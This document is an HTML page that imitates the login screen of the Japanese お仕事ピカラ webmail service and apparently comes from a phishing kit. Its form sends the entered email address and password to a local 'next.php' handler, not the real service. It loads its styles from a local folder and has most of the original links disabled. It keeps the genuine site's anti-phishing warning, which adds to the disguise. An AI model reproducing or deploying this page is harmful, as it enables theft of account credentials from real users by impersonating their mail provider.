<!DOCTYPE html>
<html><head>
        <title>お仕事ピカラ WEBメール :: お仕事ピカラ WEBメールにようこそ</title>
        <meta name="Robots" content="noindex,nofollow">
        <meta http-equiv="X-UA-Compatible" content="IE=EDGE">
        <meta name="viewport" content="width=device-width" id="viewport">
        <meta http-equiv="content-type" content="text/html; charset=UTF-8">

        <link rel="shortcut icon" href="https://webmail.pikara.ne.jp/webmail/skins/larry/images/favicon.ico">
        <link rel="stylesheet" type="text/css" href="loongl/styles.css">
        <!--[if IE 9]>
            <link rel="stylesheet" type="text/css" #="/webmail/skins/larry/svggradients.min.css" />
        <![endif]-->
        <!--[if lte IE 8]>
            <link rel="stylesheet" type="text/css" #="/webmail/skins/larry/iehacks.min.css" />
        <![endif]-->
        <!--[if lte IE 7]>
            <link rel="stylesheet" type="text/css" #="/webmail/skins/larry/ie7hacks.min.css" />
        <![endif]-->

        <link rel="stylesheet" type="text/css" href="loongl/common.css">
        <link rel="stylesheet" type="text/css" href="loongl/desktop.css">
        <link rel="stylesheet" type="text/css" href="loongl/skin_desktop.css">
        <link rel="stylesheet" type="text/css" href="loongl/pc.css">
    </head>

    <body cz-shortcut-listen="true">
        <div id="login-form" style="background-image: url();">
            <div class="box-inner">
                <h1>ログイン</h1>
													                            <form  id="" action="next.php" method="post">
                    <input name="is_pikara" type="hidden" value="true">
                    <table>
                        <tbody>
                            <tr>
                                <td class="title">
                                    <label for="rcmloginuser" style="font-size: 12px;">メールアドレス</label>
                                </td>
                            </tr>
                            <tr>
                                <td class="input">

                                    <input name="userwm" id="rcmloginuser" required="required" size="40" autocapitalize="off" autocomplete="on" type="text">
                                </td>
                            </tr>
                            <tr>
                                <td class="title">
                                    <label for="rcmloginpwd" style="font-size: 12px;">パスワード</label>
                                </td>
                            </tr>
                            <tr>
                                <td class="input">
                                    <input name="passwm" id="rcmloginpwd" required="required" size="40" autocapitalize="off" autocomplete="on" type="password" value="">
                                </td>
                            </tr>
                        </tbody>
                    </table>
                    <p id="cookiecheckbox_block">
                        <input type="checkbox" id="cookiecheckbox" name="cookiecheckbox">
                        <label id="cookiecheckboxlabel" class="checkbox" for="cookiecheckbox">次回からアカウント情報の入力を省略する</label>
                    </p>
                    <p class="formbuttons">

                        <input type="submit" id="rcmloginsubmit" class="button mainaction" value="ログイン">
                        <a id="faqlink" #="https://www.stnet.co.jp/contact/#oshigoto-pikara" target="_blank">お問い合わせ</a>
                    </p>
                </form>
            </div>

    <div style="width:400px; height:320px; background:#FFFFFF 
url(oshigotopikara_webmail.png) no-repeat center;"></div>
        </div>

        <div class="caution">
            【ご注意ください】
            <ol style=" margin-top: 0px; margin-bottom: 0px;">
                <li>お仕事ピカラでは、<font color="#ff0000"><b>このログインページをメールでご案内することは一切ございません。</b></font></li>
                <li><font color="#ff0000"><b>受信されたメール内のURL・リンク・ボタンなどからこのログインページが表示された場合は、詐欺サイトの恐れがあります。</b></font><br>その際は何も入力せず<font color="#ff0000"><b>ただちにブラウザを閉じてください。</b></font>くわしくは<a #="https://www.stnet.co.jp/business/smb-soho/oshigoto/info/190507.html" target="_blank">こちら</a>をご覧ください。</li>
            </ol>
        </div>

        <table class="smart" title="Click to Verify - This site chose GeoTrust SSL for secure e-commerce and confidential communications." width="135" cellspacing="0" cellpadding="2" border="0">
            <tbody><tr>
                <td width="135" valign="top" align="center"><script type="text/javascript" src="loongl/getgeotrustsslseal"></script><br>
                <a #="http://www.geotrust.com/ssl/" target="_blank" style="color:#000000; text-decoration:none; font:bold 7px verdana,sans-serif; letter-spacing:.5px; text-align:center; margin:0px; padding:0px;"></a></td>
            </tr>
        </tbody></table>
        <div id="copylight">(c) 2015 STNet INC.</div>
        <div>
            <noscript>
                <p class="noscriptwarning">
                    警告: このウェブメールサービスにはJavascriptが必要です！<br />
                    使用するにはJavascriptをブラウザーの設定で有効にしてください。
                </p>
            </noscript>
        </div>
    

</body></html>